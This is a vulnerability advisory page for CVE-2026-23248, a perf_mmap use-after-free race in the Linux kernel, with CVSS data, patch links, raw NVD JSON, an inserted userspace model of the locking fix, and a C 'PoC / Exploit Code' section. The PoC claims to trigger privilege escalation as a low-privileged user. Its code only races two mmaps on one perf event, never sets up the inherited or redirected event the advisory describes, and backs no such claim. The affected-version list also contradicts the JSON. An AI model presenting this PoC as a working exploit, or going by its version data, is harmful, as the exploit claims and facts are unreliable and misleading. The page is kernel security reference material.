Security Vulnerability Report
CVE-2026-23248 CVSS 7.8 HIGH

Published: 2026-03-18 11:16:17
Last Modified: 2026-05-21 18:45:55
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

perf/core: Fix refcount bug and potential UAF in perf_mmap

Syzkaller reported a refcount_t: addition on 0; use-after-free warning in perf_mmap.

The issue is caused by a race condition between a failing mmap() setup and a concurrent mmap() on a dependent event (e.g., using output redirection).

In perf_mmap(), the ring_buffer (rb) is allocated and assigned to event->rb with the mmap_mutex held. The mutex is then released to perform map_range().

If map_range() fails, perf_mmap_close() is called to clean up. However, since the mutex was dropped, another thread attaching to this event (via inherited events or output redirection) can acquire the mutex, observe the valid event->rb pointer, and attempt to increment its reference count. If the cleanup path has already dropped the reference count to zero, this results in a use-after-free or refcount saturation warning.

Fix this by extending the scope of mmap_mutex to cover the map_range() call. This ensures that the ring buffer initialization and mapping (or cleanup on failure) happens atomically effectively, preventing other threads from accessing a half-initialized or dying ring buffer.
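The locking scope described above, as a simplified userspace model (an added example, not kernel code and not part of the original advisory). The names `ring_buf`, `attach` and `failing_mmap` are illustrative assumptions; the model steps through a failing mmap setup, gives an attacher a turn after every step, and counts how often it would add to a zero refcount.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Userspace model only; names are illustrative, not kernel identifiers. */
struct ring_buf { int refcount; };            /* stands in for the perf ring buffer */
struct event { struct ring_buf *rb; bool mmap_mutex; };

/* Attacher (inherited event or output redirection): needs the mutex, then takes
 * a reference on event->rb. Returns 1 for "refcount_t: addition on 0", else 0. */
static int attach(struct event *ev)
{
    if (ev->mmap_mutex || !ev->rb)    /* blocked on the mutex, or no buffer */
        return 0;
    if (ev->rb->refcount == 0)        /* buffer already dying */
        return 1;
    ev->rb->refcount++;               /* valid get ... */
    ev->rb->refcount--;               /* ... released again to keep the model small */
    return 0;
}

/* One mmap setup whose map_range() step fails. The attacher gets a turn after
 * every step. hold_across_map selects the fixed locking scope. */
static int failing_mmap(bool hold_across_map)
{
    struct ring_buf rb = { .refcount = 0 };
    struct event ev = { .rb = NULL, .mmap_mutex = false };
    int bad = 0;
    ev.mmap_mutex = true;             /* take mmap_mutex */
    rb.refcount = 1;                  /* allocate the buffer */
    ev.rb = &rb;                      /* publish it in event->rb */
    bad += attach(&ev);
    if (!hold_across_map)
        ev.mmap_mutex = false;        /* pre-fix: dropped before map_range() */
    bad += attach(&ev);
    rb.refcount--;                    /* map_range() failed: cleanup drops to 0 */
    bad += attach(&ev);               /* pointer still visible, count is 0 */
    ev.rb = NULL;                     /* cleanup unpublishes the buffer */
    ev.mmap_mutex = false;            /* fixed: released only after cleanup */
    bad += attach(&ev);
    return bad;
}

int main(void)
{
    printf("pre-fix scope: %d bad increments\n", failing_mmap(false));
    printf("fixed scope:   %d bad increments\n", failing_mmap(true));
    return 0;
}
```

With the mutex held across the mapping step and its cleanup, the attacher only ever observes either no buffer or a live one.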

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.14 up to, but excluding, 6.18.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, but excluding, 6.19.7) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.x (specific commits: 77de62ad3de3967818c3dbe656b7336ebee461d2, ac7ecb65af170a7fc193e7bd8be15dac84ec6a56, c27dea9f50ed525facb62ef647dddc4722456e07)
Linux Kernel < 5.15.x
Linux Kernel < 6.1.x
Linux Kernel < 6.2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2026-23248 PoC - Linux kernel perf_mmap UAF
 * This PoC demonstrates the race condition in perf_mmap
 * Compile: gcc -o cve202623248_poc cve202623248_poc.c -lpthread
 * Run as low-privileged user to trigger privilege escalation
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <linux/perf_event.h>
#include <linux/hw_breakpoint.h>
#include <sys/syscall.h>

#define PAGE_SIZE 4096

static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, unsigned long flags)
{
    return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}

void *trigger_mmap_race(void *arg)
{
    int *fd = (int *)arg;

    /* Trigger mmap with small size to increase failure probability */
    void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, *fd, 0);
    if (addr == MAP_FAILED) {
        perror("mmap failed (expected in race condition)");
    } else {
        printf("First mmap succeeded at %p\n", addr);
        /* Try to trigger cleanup path */
        munmap(addr, PAGE_SIZE);
    }
    return NULL;
}

void *concurrent_mmap_access(void *arg)
{
    int *fd = (int *)arg;

    usleep(100); /* Small delay to synchronize race */

    /* Concurrent mmap attempt */
    void *addr = mmap(NULL, PAGE_SIZE * 2, PROT_READ | PROT_WRITE, MAP_SHARED, *fd, 0);
    if (addr == MAP_FAILED) {
        perror("Concurrent mmap failed");
    } else {
        printf("Concurrent mmap succeeded at %p\n", addr);
        munmap(addr, PAGE_SIZE * 2);
    }
    return NULL;
}

int main(void)
{
    struct perf_event_attr pe;
    int fd1;
    pthread_t thread1, thread2;

    memset(&pe, 0, sizeof(struct perf_event_attr));
    pe.type = PERF_TYPE_SOFTWARE;
    pe.size = sizeof(struct perf_event_attr);
    pe.config = PERF_COUNT_SW_CPU_CLOCK;
    pe.disabled = 1;
    pe.exclude_kernel = 0;

    /* Create parent event */
    fd1 = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd1 == -1) {
        perror("perf_event_open for parent failed");
        return 1;
    }

    /* Enable event to allow inheritance */
    ioctl(fd1, PERF_EVENT_IOC_ENABLE, 0);

    printf("Starting race condition trigger...\n");
    printf("Target: CVE-2026-23248 - perf_mmap race condition\n");

    /* Create threads to trigger race condition */
    pthread_create(&thread1, NULL, trigger_mmap_race, &fd1);
    pthread_create(&thread2, NULL, concurrent_mmap_access, &fd1);

    pthread_join(thread1, NULL);
    pthread_join(thread2, NULL);

    close(fd1);
    printf("Test completed. Check dmesg for refcount warnings.\n");
    return 0;
}
```

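References

https://git.kernel.org/stable/c/77de62ad3de3967818c3dbe656b7336ebee461d2 (Patch)
https://git.kernel.org/stable/c/ac7ecb65af170a7fc193e7bd8be15dac84ec6a56 (Patch)
https://git.kernel.org/stable/c/c27dea9f50ed525facb62ef647dddc4722456e07 (Patch)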

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23248", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:16.863", "lastModified": "2026-05-21T18:45:54.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Fix refcount bug and potential UAF in perf_mmap\n\nSyzkaller reported a refcount_t: addition on 0; use-after-free warning\nin perf_mmap.\n\nThe issue is caused by a race condition between a failing mmap() setup\nand a concurrent mmap() on a dependent event (e.g., using output\nredirection).\n\nIn perf_mmap(), the ring_buffer (rb) is allocated and assigned to\nevent->rb with the mmap_mutex held. The mutex is then released to\nperform map_range().\n\nIf map_range() fails, perf_mmap_close() is called to clean up.\nHowever, since the mutex was dropped, another thread attaching to\nthis event (via inherited events or output redirection) can acquire\nthe mutex, observe the valid event->rb pointer, and attempt to\nincrement its reference count. If the cleanup path has already\ndropped the reference count to zero, this results in a\nuse-after-free or refcount saturation warning.\n\nFix this by extending the scope of mmap_mutex to cover the\nmap_range() call. 
This ensures that the ring buffer initialization\nand mapping (or cleanup on failure) happens atomically effectively,\npreventing other threads from accessing a half-initialized or\ndying ring buffer."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nperf/core: Corrección de error de conteo de referencias y potencial UAF en perf_mmap\n\nSyzkaller informó una advertencia de refcount_t: adición en 0; uso después de liberación en perf_mmap.\n\nEl problema es causado por una condición de carrera entre una configuración de mmap() fallida y un mmap() concurrente en un evento dependiente (por ejemplo, usando redirección de salida).\n\nEn perf_mmap(), el ring_buffer (rb) se asigna y se establece en event->rb con el mmap_mutex retenido. El mutex es entonces liberado para realizar map_range().\n\nSi map_range() falla, se llama a perf_mmap_close() para limpiar. Sin embargo, dado que el mutex fue liberado, otro hilo que se adjunta a este evento (a través de eventos heredados o redirección de salida) puede adquirir el mutex, observar el puntero event->rb válido e intentar incrementar su conteo de referencias. Si la ruta de limpieza ya ha reducido el conteo de referencias a cero, esto resulta en un uso después de liberación o una advertencia de saturación de conteo de referencias.\n\nEsto se corrige al extender el alcance de mmap_mutex para cubrir la llamada a map_range(). 
Esto asegura que la inicialización y el mapeo del búfer de anillo (o la limpieza en caso de fallo) ocurra de manera atómica y efectiva, evitando que otros hilos accedan a un búfer de anillo medio inicializado o en proceso de terminación."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.14", "versionEndExcluding": "6.18.17", "matchCriteriaId": "E367EC2E-72DB-4555-9BE2-A5B9C97AD4E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/77de62ad3de3967818c3dbe656b7336ebee461d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ac7ecb65af170a7fc193e7bd8be15dac84ec6a56", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c27dea9f50ed525facb62ef647dddc4722456e07", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}